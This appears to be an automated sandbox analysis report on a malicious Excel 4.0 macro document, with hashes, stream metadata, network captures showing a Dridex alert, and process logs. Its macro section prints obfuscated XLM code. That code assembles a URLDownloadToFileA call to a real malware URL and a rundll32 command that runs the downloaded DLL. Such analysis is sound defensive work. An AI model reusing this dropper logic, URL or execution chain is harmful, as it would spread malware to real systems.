                                                    Encrypted:false
                                                    SSDEEP:24576:5hHy+lLB10y0hvDP3PnlFnIOAVMeuaBAvRSM4eja:5hJl9N0hrHnlFnIOADAvRYB
                                                    MD5:C5DF0AA6752CBADA9CC1461F1AE6B64C
                                                    SHA1:17C84C667875594B0285B7412D0BE37FD05CD504
                                                    SHA-256:997428256801049343CE5926CE4652FA0D74E4AB6A93C809C8CC385DEC620123
                                                    SHA-512:21E383BFC558F0B05239A00DE59AD99F631226533AFC9D73F251EEA26754936931BF19BE7F9945800702AA4CDB5AFEC503740AA40AD72E9C96FC72E0DB943A7D
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........E.........E.......E.......E.............................m........6...T......T......T......T......Rich...........PE..L...X.\...........!.....8...........D.......P.......................................=....@.........................`z.......z..d........v.......................k......T...............................@............P..,............................text...C7.......8.................. ..`.rdata..F>...P...@...<..............@..@.data................|..............@....rsrc....v.......x...B..............@..@.reloc...k.......l..................@..B........................................................................................................................................................................................................................................................................................................

                                                    Static File Info

                                                    General

                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Last Saved By: Windows User, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Apr 7 13:38:33 2021, Security: 0
                                                    Entropy (8bit):3.202085554218189
                                                    TrID:
                                                    • Microsoft Excel sheet (30009/1) 78.94%
                                                    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                    File name:Documents_460000622_1464906353.xls
                                                    File size:291840
                                                    MD5:bcd540201ec5e0301816d194bb15ec30
                                                    SHA1:e5ca3f6cbb69736c904ff77f7ab6514fc48153a3
                                                    SHA256:a83ce7af997c7514b9faa386fde353ce094e7ef5bfc31dfb52dc9f5d7cfee43e
                                                    SHA512:51904ad2d3d789b7855b2499e3917a0d8b5ba31acf7120763ef3a10b11855b5312ca92c7f96d0893acd8b014b06510f0ec2c0c72430159575106b2c9dc2645c4
                                                    SSDEEP:6144:46tIrWqoY5O3vuVULCc9u/vRTP8RXToK+dmXaU:JxaU
                                                    File Content Preview:........................>.......................8...........................3...4...5...6...7..................................................................................................................................................................

                                                    File Icon

                                                    Icon Hash:e4eea286a4b4bcb4

                                                    Static OLE Info

                                                    General

                                                    Document Type:OLE
                                                    Number of OLE Files:1

                                                    OLE File "Documents_460000622_1464906353.xls"

                                                    Indicators

                                                    Has Summary Info:True
                                                    Application Name:Microsoft Excel
                                                    Encrypted Document:False
                                                    Contains Word Document Stream:False
                                                    Contains Workbook/Book Stream:True
                                                    Contains PowerPoint Document Stream:False
                                                    Contains Visio Document Stream:False
                                                    Contains ObjectPool Stream:
                                                    Flash Objects Count:
                                                    Contains VBA Macros:True

                                                    Summary

                                                    Code Page:1252
                                                    Last Saved By:Windows User
                                                    Create Time:2006-09-16 00:00:00
                                                    Last Saved Time:2021-04-07 12:38:33
                                                    Creating Application:Microsoft Excel
                                                    Security:0

                                                    Document Summary

                                                    Document Code Page:1252
                                                    Thumbnail Scaling Desired:False
                                                    Contains Dirty Links:False

                                                    Streams

                                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                    General
                                                    Stream Path:\x5DocumentSummaryInformation
                                                    File Type:data
                                                    Stream Size:4096
                                                    Entropy:0.35273196153
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . . . . . . . E x c e l 4 . 0 M a c r o s . . . . . . . . . . . .
                                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d0 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 89 00 00 00 02 00 00 00 e4 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                    General
                                                    Stream Path:\x5SummaryInformation
                                                    File Type:data
                                                    Stream Size:4096
                                                    Entropy:0.272742285417
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . X . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . W i n d o w s U s e r . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . * . . . + . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 90 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 58 00 00 00 0c 00 00 00 70 00 00 00 0d 00 00 00 7c 00 00 00 13 00 00 00 88 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 10 00 00 00 57 69 6e 64 6f 77 73 20
                                                    Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 279643
                                                    General
                                                    Stream Path:Book
                                                    File Type:Applesoft BASIC program data, first line number 8
                                                    Stream Size:279643
                                                    Entropy:3.18536385559
                                                    Base64 Encoded:True
                                                    Data ASCII:. . . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . W i n d o w s U s e r B . . . . . . . . . . . . . . . . . . . . . . . D o c s 2 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 . . 8 . . . . . . . X
                                                    Data Raw:09 08 08 00 00 05 05 00 0a 54 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 0c 57 69 6e 64 6f 77 73 20 55 73 65 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                    Macro 4.0 Code

                                                    =ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=EXEC('Docs 3'!BP86&'Docs 3'!BP87&'Docs 3'!BO97&'Docs 3'!BO98&'Docs 3'!BR66&'Docs 3'!BR86&'Docs 3'!BR87&'Docs 3'!BT94&'Docs 3'!BR103&'Docs 3'!BT101)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)='Docs 3'!BA19()
                                                    ,,,,,,ht,,,,,,tps://,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=FORMULA(BJ10&BJ11&'Docs 3'!BI37&'Docs 3'!BI38,BJ8)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)",,,,,,"=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=CALL(""U""&'Docs 3'!BQ77&'Docs 3'!BM72&""L""&'Docs 3'!BM73&'Docs 3'!BO73,""UR""&'Docs 3'!BT72&'Docs 3'!BT73&'Docs 3'!BU71&'Docs 3'!BS80&'Docs 3'!BS81,'Docs 3'!BU77&'Docs 3'!BU84,0,BJ8,'Docs 3'!BR66,0,0)='Docs 1'!AR25()",,,,,,
                                                    =HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,whiskyexpanse.com/ke/ohior.,,,,,,,,,,,,,,,,,,,,dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\ndgfht.frg,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,nload,,,,,,,,,,,,R,,,,,,,,,,,,,,,,,,,,Mo,,n,,,,,LDow,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,JJC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ToFil,,,,,,,,,,,,,,,,,,,,eA,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,CBB,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,,",Pl",,,,,,,,,,,,,,,,,,u,,ugi,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,nI,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ndl,,,,,,,,,,,,,,,,,,,,l32 ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,it,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n,,,

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    04/07/21-18:47:53.102805TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434917052.12.4.186192.168.2.22

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Apr 7, 2021 18:47:18.377865076 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:18.469909906 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:18.470122099 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:18.479497910 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:18.571708918 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:18.575726986 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:18.575788021 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:18.575849056 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:18.575891018 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:18.592698097 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:18.686321020 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:18.686815977 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:18.686868906 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:18.970978975 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.062788963 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.239533901 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.239584923 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.239622116 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.239650011 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.239675999 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.239715099 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.239742994 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.239764929 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.239816904 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.239826918 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.239834070 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.240355968 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.240389109 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.240458965 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.240489960 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.241555929 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.241626978 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.241698027 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.241822004 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.243746996 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.243788958 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.243948936 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.245755911 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.245806932 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.245882988 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.245932102 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.248019934 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.248048067 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.248119116 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.248164892 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.260421038 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.312257051 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.312293053 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.312510014 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.312722921 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.312791109 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.312800884 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.312856913 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.315057039 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.315093040 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.315179110 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.317131996 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.317171097 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.317218065 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.317246914 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.320336103 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.320369005 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.320453882 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.321410894 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.321526051 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.321531057 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.321587086 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.323760033 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.323796034 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.323838949 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.323865891 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.325587988 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.325642109 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.325664043 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.325696945 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.331682920 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.331720114 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.331888914 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.332788944 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.332850933 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.332894087 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.332945108 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.335443974 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.335474968 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.335551023 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.336894989 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.336955070 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.397053957 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.397092104 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.397334099 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.397589922 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.397618055 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.397665977 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.397691965 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.398617983 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.398648977 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.398695946 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.398722887 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.400782108 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.400810957 CEST44349167104.21.3.47192.168.2.22

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Apr 7, 2021 18:47:18.337178946 CEST5219753192.168.2.228.8.8.8
                                                    Apr 7, 2021 18:47:18.366961956 CEST53521978.8.8.8192.168.2.22
                                                    Apr 7, 2021 18:47:52.051546097 CEST5309953192.168.2.228.8.8.8
                                                    Apr 7, 2021 18:47:52.065507889 CEST53530998.8.8.8192.168.2.22
                                                    Apr 7, 2021 18:47:52.069269896 CEST5283853192.168.2.228.8.8.8
                                                    Apr 7, 2021 18:47:52.082361937 CEST53528388.8.8.8192.168.2.22
                                                    Apr 7, 2021 18:47:53.861712933 CEST6120053192.168.2.228.8.8.8
                                                    Apr 7, 2021 18:47:53.875118971 CEST53612008.8.8.8192.168.2.22
                                                    Apr 7, 2021 18:47:53.881526947 CEST4954853192.168.2.228.8.8.8
                                                    Apr 7, 2021 18:47:53.900218964 CEST53495488.8.8.8192.168.2.22

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    Apr 7, 2021 18:47:18.337178946 CEST192.168.2.228.8.8.80x15d4Standard query (0)whiskyexpanse.comA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    Apr 7, 2021 18:47:18.366961956 CEST8.8.8.8192.168.2.220x15d4No error (0)whiskyexpanse.com104.21.3.47A (IP address)IN (0x0001)
                                                    Apr 7, 2021 18:47:18.366961956 CEST8.8.8.8192.168.2.220x15d4No error (0)whiskyexpanse.com172.67.130.61A (IP address)IN (0x0001)

                                                    HTTPS Packets

                                                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                    Apr 7, 2021 18:47:18.575788021 CEST104.21.3.47443192.168.2.2249167CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Mar 16 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Wed Mar 16 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                    CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                    Apr 7, 2021 18:47:53.102804899 CEST52.12.4.186443192.168.2.2249170CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=ATCN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=ATWed Apr 07 09:39:35 CEST 2021Thu Apr 07 09:39:35 CEST 2022771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87

                                                    Code Manipulations

                                                    Statistics

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    Analysis Process: EXCEL.EXE PID: 2004 Parent PID: 584

                                                    General

                                                    Start time:18:46:40
                                                    Start date:07/04/2021
                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                    Imagebase:0x13f6f0000
                                                    File size:27641504 bytes
                                                    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Analysis Process: rundll32.exe PID: 2536 Parent PID: 2004

                                                    General

                                                    Start time:18:46:45
                                                    Start date:07/04/2021
                                                    Path:C:\Windows\System32\rundll32.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:rundll32 ..\ndgfht.frg,PluginInit
                                                    Imagebase:0xff8a0000
                                                    File size:45568 bytes
                                                    MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Analysis Process: rundll32.exe PID: 1108 Parent PID: 2536

                                                    General

                                                    Start time:18:46:45
                                                    Start date:07/04/2021
